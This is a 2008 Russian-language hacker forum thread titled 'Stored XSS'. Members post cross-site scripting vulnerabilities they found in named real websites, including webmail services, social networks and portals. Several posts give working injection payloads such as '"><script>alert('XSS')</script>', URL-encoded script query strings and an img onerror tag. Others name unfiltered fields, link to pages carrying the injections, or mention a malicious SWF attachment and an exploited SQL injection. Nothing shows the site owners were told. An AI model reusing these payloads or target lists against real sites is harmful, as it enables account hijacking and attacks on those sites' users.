Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Вот нашол свою первую XSS

    Онлайн игра azona.ru

    Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
    потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
    и вот XSS

    ЗЫ вроде туда запостил если нет переместите в нужный раздел
     
  2. x-demon

    x-demon Elder - Старейшина

    Joined:
    10 Jun 2007
    Messages:
    315
    Likes Received:
    101
    Reputations:
    46
    Это пассивка вроде
    А поля там все уязвимы..
     
  3. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    http://hnu.univerlife.com/prepods/comps/14672/
     
    2 people like this.
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    Екатеринбурский крупнейший портал города:
    www.e1.ru - там есть такая штука как фотоальбом, так в фотоальбоме к фотографиям есть поле "Название" к фотографиямесле там уязвимое поле под XSS
     
    _________________________
    1 person likes this.
  5. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    http://www.rozetka.com.ua/ru/products/comments/9217/index.html
     
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    пассивные
    http://noxak.ru/snak3_find.html , но на SMSline.Biz .
    там стоит уже алерт. указываем телефон и гоу, да хоть алерт в форму телефона.


    Довольно-таки крупный поисковик.
    http://wwjd.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3B%3C%2Fscript%3E
    14 алертов
     
    #226 Sn@k3, 7 Sep 2008
    Last edited: 7 Sep 2008
    1 person likes this.
  7. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Активная xss в почтовике http://www.email.ro
    Шлем в теле письма: <img src=1.gif onerror=xss>
     
    #227 BlackSun, 11 Sep 2008
    Last edited: 11 Sep 2008
    1 person likes this.
  8. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    wow.citynov.ru

    В личных сообщениях не фильтруется поле "Тема".
     
    2 people like this.
  9. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Estemail.com.ua - полуплатная говнопочта.

    Тупо не фильтруется поле "Тема" в письме.
     
    2 people like this.
  10. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Универсальный оператор связи.
    http://eltel.net/news/announcements/?id=%3Cscript%3Ealert('xss')%3C/script%3E
     
  11. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    https://cafe.steampowered.com/index.php?area=cafe/directory&country="><script>alert('XSS')</script>

    дерзайте сайт всемирный фирмы каторая держить кс!
    XSS нашол не я! ибо нашол на забугорных сайтах xss
    Так же была найдена SQL иньекция (без поддомена cafe) к сожелению ее прикрыли но хакер выхватил то что надо.......

    Спасибо за внимание!

    (извените если не туда)
     
  12. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    [​IMG] Meta.ua

    Активная XSS при открытии вложения, а именно злобного SWF-файла.
    Работает в Mozilla Firefox.
    Файл создавать так:
    http://forum.antichat.ru/showthread.php?t=65360
    Проверил в Opera 9.52- тоже работает.
     
    #232 iddqd, 22 Sep 2008
    Last edited: 23 Sep 2008
  13. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    goroskop.bigmir.net

    Уязвимо поле "Имя" при составлении любого гороскопа, однако статическая страница с XSS-кодом выводится только в "Персональном гороскопе".
    Пример:
     
  14. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Gmail.com
    Та же самая ситуация с ядовитой флешкой.
    Работает в Opera 9.52 и в FF 3 (на второй ветке не проверял).
     
  15. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Rambler.ru
    И опять 25. Баги с гороскопами повторяются, на сей раз под скальпелем- Рамблер(движок гороскопов тот же, что и на Бигмире).

    "Персональный":
    Code:
    http://horoscopes.rambler.ru/personal/index.html#stage=payment&pid=89576&s=0590207
    "Китайский 2008":
    Code:
    http://horoscopes.rambler.ru/chineseyear/#stage=payment&pid=89576&s=28749925
     
    1 person likes this.
  16. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Ukr.net

    Украинская электронная почта №1

    При заливке видео не фильтруется параметр "Ник":
    Code:
    http://play.ukr.net/auth/profile/id/449817/
    Удалили уже...
    Code:
    http://play.ukr.net/auth/profile/id/449882/
     
    #236 iddqd, 24 Sep 2008
    Last edited: 24 Sep 2008
    3 people like this.
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    ))
     
    _________________________
  18. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    одноклассники.ру

    Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... :(

    Code:
    http://wg3.odnoklassniki.ru/dk?st.cmd=altGroupMain&st.groupId=43219581272223&tkn=1446
     
    4 people like this.
  19. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    В продолжение темы о социальных сетях...
    connect.ua

    "Мои фото" -> создаем альбом.
    Не фильтруются поля "Описание"(работает в списке альбомов) и "Название"(работает при входе в альбом, но тут надо приписать закрытый тег </title>).

    Code:
    [COLOR=Yellow][B]http://connect.ua/myphotos-272106[/B][/COLOR]
    "Аудио"- не фильтруются поля "Альбом" и "Исполнитель". Работает в "Моих записях" и на главной странице(!) профиля.

    Code:
    [COLOR=Yellow][B]http://connect.ua/user-272106[/B][/COLOR]
    Кто хочет поискать еще- дерзайте! Кто ищет, тот... выпьет обязательно! ;)
     
    3 people like this.
  20. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    TUT.UA- молодой, но довольно крупный проект.

    При регистрации называем себя именем:
    Code:
    "><script>alert()</script>
    Code:
    http://ligendo.photo.tut.ua/
    + в списке новых пользователей:
    Code:
    http://photo.tut.ua/